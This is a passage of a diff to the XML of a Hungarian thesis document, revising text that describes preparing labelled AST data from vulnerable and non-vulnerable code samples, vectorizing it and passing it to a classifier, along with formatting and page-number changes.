+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>..</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16749,13 +16811,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mappában helyezked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ik el</w:t>
+        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16788,6 +16844,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -16921,13 +16978,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
+        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17012,31 +17063,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>irodalomjegyzék [1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>] elem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e segítségével</w:t>
+        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17202,6 +17229,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -17528,13 +17556,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(„</w:t>
+        <w:t xml:space="preserve"> („</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -17733,6 +17755,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -17791,13 +17814,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17857,14 +17874,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>pdo1_as</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>t.csv</w:t>
+        <w:t>pdo1_ast.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17987,112 +17997,357 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>concatenate.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> által</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>concatenate</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d.csv fájlba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, majd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkézem őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nnak duplikáltjában, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d_title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> által</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, majd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkézem őket, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18104,19 +18359,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
+        <w:t xml:space="preserve">kézett </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18130,110 +18373,49 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>vectorizer</w:t>
+        <w:t>tanulo_adatok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>\</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>concatenated</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>_titled</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated.csv</w:t>
+        <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18970,13 +19152,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">formában </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kerülnek be a szavak</w:t>
+        <w:t>formában kerülnek be a szavak</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19147,6 +19323,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
@@ -19183,19 +19360,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bináris számain is, amiket pedig az </w:t>
+        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19231,9 +19396,9 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
             <wp:extent cx="3784795" cy="1892397"/>
@@ -19322,27 +19487,29 @@
         </w:rPr>
         <w:t xml:space="preserve">z </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">X[40] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és a</w:t>
-      </w:r>
+        <w:t>X[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
+        <w:t xml:space="preserve">40] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19350,7 +19517,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>y</w:t>
+        <w:t xml:space="preserve">z </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19358,7 +19525,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>[40</w:t>
+        <w:t>y[40</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19498,7 +19665,21 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenated.csv</w:t>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19581,7 +19762,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -19591,6 +19779,7 @@
         <w:t>npy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19607,6 +19796,120 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\cevtorizer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tehát két</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>olyan .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>npy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlt hoz létre, amit később </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, az osztályozásért felelős fájl </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tud használni.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19617,44 +19920,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egy olyan .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>npy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlt hoz létre, amit később egy osztályozási algoritmus tud használni.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19670,7 +19935,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trainer</w:t>
+        <w:t>diagrams</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -24878,6 +25143,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -1916,7 +1916,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1990,7 +1990,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2064,7 +2064,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2155,7 +2155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2247,7 +2247,7 @@
